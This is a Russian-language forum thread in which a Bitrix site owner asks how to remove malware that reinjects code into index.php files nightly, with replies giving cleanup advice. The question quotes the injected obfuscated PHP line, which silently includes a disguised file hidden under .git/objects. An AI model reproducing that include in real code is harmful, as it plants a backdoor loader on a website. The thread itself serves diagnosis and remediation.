Вирус на сайте добавляет строки в index.php по всем директориям. Как избавиться?

Question

[allgenl]

Пример кода, который добавляет вирус в файл index.php:

/*bc657*/
$r8 = "/ho\x6de3/login/public_ht\x6dl/.git/objects/34/.28e85653.css"; $trxc61 = substr($r8, 0); @include_once /* nk */ ($trxc61);
/*bc657*/

При наличии данного кода в используемых файлах возникают ошибки и страница не открывается. В самом коде видно что прописывается путь к файлу, который является вредоносным. После его удаления файл создаётся в другой папке .git/objects/

Ранее вирус также во многих директориях создал .htaccess. Я удалил их все. Сейчас только основной. Сканил сайт айболитом, удалял вредоносные файлы. Опять появляются.

Также помимо этого приходит куча запросов к папкам и файлам Wordpress, хотя сайт на Битриксе. Таких запросов бывает до 1000 за буквально 5 минут. Если блокирую один IP, начинают приходить с другого.

Сама подмена происходит раз в сутки, обычно ночью, в разное время.

Comments

[Максим Ткачев]

это вирус прописывает себя в агенты на кроне. отключите крон. потом все почистите.

[Максим Ткачев]

ну иплюс накатите последние обновления. он заражется через модуль VOTE. либо его удалите либо накатите обновления

[Михаил Ливач]

а если это не агент, то по access.log смотрите запросы, и найдёте, где бэкдор

Answer 1

[pLavrenov]

Точных указаний что делать в этом случае нет, каждый сайт смотрится и решения там комплексные.

Блокировкой адресов может заниматься fail2ban без твоего участия.

Если что-то происходит каждый день и в одно и тоже время - первое что надо смотреть это крон в панели хостинга. Если там что-то есть то этот дырявый хостинг отправляется в мусорку и сайт переносится на reg.ru (никаких реклам, просто не вижу причин выбирать что-то кроме него)

На папки вордпреса идут запросы потому что скрипт комплексный.

Виной может быть нуленый плагин (или как там оно называется в этом овне), в админке есть проверка на целостность ее надо сделать в первую очередь.

Answer 2

[Владимир Е]

1. Делаете дампы файлов и бд, разворачиваете их у себя локально
2. В кастомных сущностях (папки/файлы шаблона, компонентов) вычищаете все подозрительное, зараженное
3. В бд вычищаете все подозрительное
4. Локально разворачиваете чистый битрикс
5. Переносите свои кастомные сущности в чистую установку
6. Подключаете очищенную бд к сайту
7. Смотрите работу сайта

Если все ок, то переносите чистые файлы и базу на основной сервер.
Далее меняете доступы к админке, базе, хостингу (серверу).

Если не ок, то возвращаемся к п2